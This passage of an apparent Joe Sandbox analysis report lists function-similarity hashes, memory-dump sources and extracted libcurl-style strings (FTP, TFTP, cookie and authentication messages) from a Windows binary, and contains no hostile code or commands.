                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 89febe505de102955aa40a6d6fbd39999fc8921961043ca983f536c30d848905
                                        • Instruction ID: 82c8fe0ed14ed7cd1dcadb20851dcf7bb4a0419e05b8e8ac2fd181b000bece23
                                        • Opcode Fuzzy Hash: 89febe505de102955aa40a6d6fbd39999fc8921961043ca983f536c30d848905
                                        • Instruction Fuzzy Hash: F901ACA6B14A0282DB25DF22E9641396730FF88F99B241431CD9E83728CF6CD895D350
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpymemset
                                        • String ID:
                                        • API String ID: 1579693990-0
                                        • Opcode ID: 8fb3d6d3ee099111430005b96dd445b6f329aa6f6764831057bf426af99e6c2f
                                        • Instruction ID: 7cd4d34a2989bbb6d5499c01c05f210bc453ecae2f7a68dba70cc94ad9f18a01
                                        • Opcode Fuzzy Hash: 8fb3d6d3ee099111430005b96dd445b6f329aa6f6764831057bf426af99e6c2f
                                        • Instruction Fuzzy Hash: 9C917E25B4878282FAD59A27955037B6A90BF45BCCF285038EF4DCB787DFACE4518304
                                        APIs
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF6029C98B8), ref: 00007FF6029C9A05
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF6029C98B8), ref: 00007FF6029C9A1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strncmp
                                        • String ID: I32$I64$Internal error removing splay node = %d
                                        • API String ID: 1114863663-13178787
                                        • Opcode ID: 2c182daf1c2e6d25c5e7bf0efd11d6bda6f881fcecf2cdaad549c930c6f98041
                                        • Instruction ID: cdbb0d0cbabc90240b910d35fc5f3b431d6a1d6449ca5ed51b4dc3b59d2c0826
                                        • Opcode Fuzzy Hash: 2c182daf1c2e6d25c5e7bf0efd11d6bda6f881fcecf2cdaad549c930c6f98041
                                        • Instruction Fuzzy Hash: CDA1B272A08A42C6EB208B16E49477D7FA4FF49B4CF264535DA8D87256DF7CD248C740
                                        APIs
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6029BB23A,?,?,?,?,?,?,?,00007FF6029BB007), ref: 00007FF6029D8221
                                        • strchr.VCRUNTIME140(?,?,?,00000000,TRUE,?,00000000,00000000,00000000,?), ref: 00007FF6029D83C3
                                        • strchr.VCRUNTIME140(?,?,?,00000000,TRUE,?,00000000,00000000,00000000,?), ref: 00007FF6029D83E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$_errno
                                        • String ID: 0123456789ABCDEF$0123456789abcdef$TRUE
                                        • API String ID: 2644425738-1191287149
                                        • Opcode ID: 720e810a07ba9ee7a915715f5eb5251aab670f7d7701d63ee000b7329d776947
                                        • Instruction ID: 2e0bc3d8899aea3824febf09e05ee9820bcc24bc4d0bb71c4652a28e12b7bbf7
                                        • Opcode Fuzzy Hash: 720e810a07ba9ee7a915715f5eb5251aab670f7d7701d63ee000b7329d776947
                                        • Instruction Fuzzy Hash: CE510662B1D78641EE618B16E45017E7B91BF96B8CFB84031DA4D87787EEBCE442D300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup$strchr
                                        • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced
                                        • API String ID: 3404610657-2292467869
                                        • Opcode ID: a6e86d0d8c1b604ae3b2518e346ea28a980f38ef4426c97f5ec4fbd951027936
                                        • Instruction ID: e87615e210adfab675b85daa77c723845ade8fe3ec9f8e195fb3a8f3c39919d2
                                        • Opcode Fuzzy Hash: a6e86d0d8c1b604ae3b2518e346ea28a980f38ef4426c97f5ec4fbd951027936
                                        • Instruction Fuzzy Hash: A0614161A1878645FFB28B17D6443796FA4EF4575CF280436DB8D82792DFACE884C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freememcpy$malloc
                                        • String ID: Failed to alloc scratch buffer!
                                        • API String ID: 169112436-1446904845
                                        • Opcode ID: 30bb57163dd0e459233f4c901b6c6684872ce2edd2010a8ced2156bea305e7d5
                                        • Instruction ID: d0826c1bdce61ecbfe2f5aeed8d931115e21ab126287690f303c4f41ba272656
                                        • Opcode Fuzzy Hash: 30bb57163dd0e459233f4c901b6c6684872ce2edd2010a8ced2156bea305e7d5
                                        • Instruction Fuzzy Hash: 05518076A1878186EB25CB66E4403AABBA0FF09788F640535CF8D57756DFBCE194C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strstr
                                        • String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$RETR response: %03d
                                        • API String ID: 1392478783-2096918210
                                        • Opcode ID: 9a402e8cf4004aa73a4df746a83b6670b64194dc558fb749e3d42ca1ab97fcf1
                                        • Instruction ID: 67fa7dd509023054c5b856f48c949d87f2164f414549a1433be62b4b4fd47962
                                        • Opcode Fuzzy Hash: 9a402e8cf4004aa73a4df746a83b6670b64194dc558fb749e3d42ca1ab97fcf1
                                        • Instruction Fuzzy Hash: A151F672A0878682FF24972AE4442B96B90FF4576CF644675DA5C836D7EFFCE4828700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID: Signature: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$Signature
                                        • API String ID: 2190258309-3231818857
                                        • Opcode ID: 8ead59d0cc5f3b0d3cd798f73adf085f83e2e1a8f83e072cb6227eff2c3bee4e
                                        • Instruction ID: b8b23e0476b502a928bc480fec3f3fef71ddf70a6c45f24af5bbd45329ff7b82
                                        • Opcode Fuzzy Hash: 8ead59d0cc5f3b0d3cd798f73adf085f83e2e1a8f83e072cb6227eff2c3bee4e
                                        • Instruction Fuzzy Hash: C351B762A4C7C285EBE1CB26A4442BA7BA4FF45BD8F640432DA4D93756DFBCE145C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLastfreememcpy
                                        • String ID: *$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$We got a 421 - timeout!
                                        • API String ID: 1248052217-2335292235
                                        • Opcode ID: 013f559d9c1116de28fbcc304facaa6d4dbf8564b529c43bdfbb009aba29f948
                                        • Instruction ID: f01e0d2fea2df394768b932c8b1c2e390a2920fc7317b8da9edfdb457ff42c34
                                        • Opcode Fuzzy Hash: 013f559d9c1116de28fbcc304facaa6d4dbf8564b529c43bdfbb009aba29f948
                                        • Instruction Fuzzy Hash: F151BF32A0868291FF649A27D9503B91B90BF85B9CF248575DE4EC72D7FFACE4858304
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Digest$stale$true
                                        • API String ID: 1294909896-2487968700
                                        • Opcode ID: fa91a0250978750f9259b25ace6eee135c3ef38397716072aef58d0f62bb0c78
                                        • Instruction ID: 8628c16c27ee930db969e64270aae04e5cf0661951a3750733f8453b7d798e7f
                                        • Opcode Fuzzy Hash: fa91a0250978750f9259b25ace6eee135c3ef38397716072aef58d0f62bb0c78
                                        • Instruction Fuzzy Hash: 78516322A08B4681FBA08F26E5503BA7BA0FF44B98F644131EE9DC76C6DF6CE555C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memchrmemcpyrecvfrom
                                        • String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
                                        • API String ID: 3107918033-477593554
                                        • Opcode ID: 0c93f5223128682b2c0041b548f434a10e6fe3b52573237400c3c347fc413c6c
                                        • Instruction ID: 3e1d50baa6218e1be21deb54095b6a4a5fb173df0d544ef5d90c9b6cd915099c
                                        • Opcode Fuzzy Hash: 0c93f5223128682b2c0041b548f434a10e6fe3b52573237400c3c347fc413c6c
                                        • Instruction Fuzzy Hash: 2151A072A0868285EB64DB26D4503BA7B90FF85B48F244137DA8DC778AEE7CE445C750
                                        APIs
                                          • Part of subcall function 00007FF6029A6DE0: memcpy.VCRUNTIME140(?,?,?,?,00000000,00007FF6029A23DB), ref: 00007FF6029A6E5E
                                          • Part of subcall function 00007FF6029A6DE0: memcpy.VCRUNTIME140(?,?,?,?,00000000,00007FF6029A23DB), ref: 00007FF6029A6E6C
                                          • Part of subcall function 00007FF6029A6DE0: memcpy.VCRUNTIME140(?,?,?,?,00000000,00007FF6029A23DB), ref: 00007FF6029A6E82
                                          • Part of subcall function 00007FF6029A3BC0: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6029A1D9B), ref: 00007FF6029A3C06
                                          • Part of subcall function 00007FF6029A5DE0: memcpy.VCRUNTIME140(?,?,?,00007FF6029A1DCA), ref: 00007FF6029A5E71
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2479
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A24B8
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2506
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2554
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                        • String ID: at line $, column
                                        • API String ID: 2665656946-191570568
                                        • Opcode ID: e3e18ae7d8bdb10a3831579929a218dcf241e4e20c85fb7eaf6288b65ea3a085
                                        • Instruction ID: 5917c07009ec9736b1ff0875b0637106849dc59b5fef7710dc27511a35ba93c9
                                        • Opcode Fuzzy Hash: e3e18ae7d8bdb10a3831579929a218dcf241e4e20c85fb7eaf6288b65ea3a085
                                        • Instruction Fuzzy Hash: 7E51B062F08B8285FB00DBA5D4943AC2B62EF447ACF105234DE6D53BDADEB8D486D340
                                        APIs
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6029A315B,?,?,?,00007FF6029A3114), ref: 00007FF6029A4AA3
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6029A315B,?,?,?,00007FF6029A3114), ref: 00007FF6029A4AF7
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,00000000,?,?,00007FF6029A315B,?,?,?,00007FF6029A3114), ref: 00007FF6029A4B1E
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6029A315B,?,?,?,00007FF6029A3114), ref: 00007FF6029A4B46
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6029A315B,?,?,?,00007FF6029A3114), ref: 00007FF6029A4B8C
                                        • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6029A315B,?,?,?,00007FF6029A3114), ref: 00007FF6029A4B93
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6029A315B,?,?,?,00007FF6029A3114), ref: 00007FF6029A4BA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 1492985063-0
                                        • Opcode ID: 8539b71a9476b0b565f630c419d2d07fcfc2176833b4c9dbc2d1a14acb684146
                                        • Instruction ID: f9ed191d5119d6e01229c8919e43b4e74b36d63f1eae400ca3d22b9df35a85b1
                                        • Opcode Fuzzy Hash: 8539b71a9476b0b565f630c419d2d07fcfc2176833b4c9dbc2d1a14acb684146
                                        • Instruction Fuzzy Hash: 0A517332A09B4181EB208B1AD49433CABA0EF85F99F25D235CE5F837A1CFB9D5429344
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
                                        • API String ID: 1294909896-1255959952
                                        • Opcode ID: 6763051c228c31c864c50f42b3268d148b359703256ab87795060e244ba2952e
                                        • Instruction ID: 8c3a6f4267006b49a77b0520cb1a6f6813db6daf5e88aa60760c7329551c1423
                                        • Opcode Fuzzy Hash: 6763051c228c31c864c50f42b3268d148b359703256ab87795060e244ba2952e
                                        • Instruction Fuzzy Hash: 3151D462A4864296FB91CB62D4802BA3F90FF40B98F640031EA4DC3696DFBDE455C390
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemalloc$_strdup
                                        • String ID: %%%02x
                                        • API String ID: 1941130848-4020994737
                                        • Opcode ID: a836fe27a0d5cae35f9326d9bbdda8680830951909b3b77083bcb3be45e33309
                                        • Instruction ID: d1bdfd70760e9d8a98f88f2b5a6b9e3f87606a8e96da3e4e6769c3265e2ecfd4
                                        • Opcode Fuzzy Hash: a836fe27a0d5cae35f9326d9bbdda8680830951909b3b77083bcb3be45e33309
                                        • Instruction Fuzzy Hash: 1F41C222A0D68245EF628B12A0143792F91BF5579CF280573DADE87BC2FEADE544D310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemalloc$_strdup
                                        • String ID: %%%02x
                                        • API String ID: 1941130848-4020994737
                                        • Opcode ID: 316bb1082a1ff7fe208b000f1608c5f407bf4d7f4cc0991fefd91e9ebab00efb
                                        • Instruction ID: 5ae5588359131cfcd11a05de2d9b26b1d09c8540d9746cab5fd4f8dca4f30572
                                        • Opcode Fuzzy Hash: 316bb1082a1ff7fe208b000f1608c5f407bf4d7f4cc0991fefd91e9ebab00efb
                                        • Instruction Fuzzy Hash: 7641C222A0D68244FF628B12A0143792F91BF56798F280573DEDE86BC3FEADE444C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemalloc$_strdup
                                        • String ID: %%%02x
                                        • API String ID: 1941130848-4020994737
                                        • Opcode ID: aae2820c9649b90ef2d383910c1fadb4125827575a96e270d23418d742a52359
                                        • Instruction ID: 0e2dfa851a2ee73bbb746e9c0dc9d0610b951b1ce67f500acc25512d4a3d8564
                                        • Opcode Fuzzy Hash: aae2820c9649b90ef2d383910c1fadb4125827575a96e270d23418d742a52359
                                        • Instruction Fuzzy Hash: E541B222A0D69245FE628B12A0143792F91BF56798F280573DEDE86BC2FEADE544D310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemalloc$_strdup
                                        • String ID: %%%02x
                                        • API String ID: 1941130848-4020994737
                                        • Opcode ID: f228cae64e71e781229f9b6479e405da6372a9773d43e5d1e04a0a821faac6b0
                                        • Instruction ID: 68c3cf041a289492047a2273e95eed840ea40c392e7c12f41229d8547fc053ae
